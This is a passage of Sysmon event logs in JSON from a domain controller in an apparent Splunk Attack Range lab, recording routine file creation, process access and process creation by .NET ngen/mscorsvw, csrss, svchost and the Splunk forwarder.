Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:43.787\r\nProcessGuid: {41C8662E-22CF-5F25-0000-00108A951100}\r\nProcessId: 4104\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1008-0\\System.Configuration.dll\r\nCreationUtcTime: 2020-08-01 08:07:43.787","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:43.787","ProcessGuid":"{41C8662E-22CF-5F25-0000-00108A951100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1008-0\\System.Configuration.dll","CreationUtcTime":"2020-08-01 08:07:43.787","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.834\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22CF-5F25-0000-0010D0991100}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.834","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"2008","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22CF-5F25-0000-0010D0991100}","TargetProcessId":"2360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.834\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22CF-5F25-0000-0010D0991100}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.834","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22CF-5F25-0000-0010D0991100}","TargetProcessId":"2360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.850\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22CF-5F25-0000-0010D0991100}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.850","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22CF-5F25-0000-0010D0991100}","TargetProcessId":"2360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.006\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4808\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22D0-5F25-0000-0010509D1100}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.006","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"4808","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22D0-5F25-0000-0010509D1100}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.006\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22D0-5F25-0000-0010509D1100}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.006","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22D0-5F25-0000-0010509D1100}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.021\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D0-5F25-0000-0010509D1100}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.021","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D0-5F25-0000-0010509D1100}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nProcessGuid: {41C8662E-22D0-5F25-0000-001017A01100}\r\nProcessId: 4372\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","ProcessGuid":"{41C8662E-22D0-5F25-0000-001017A01100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010A72A1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program 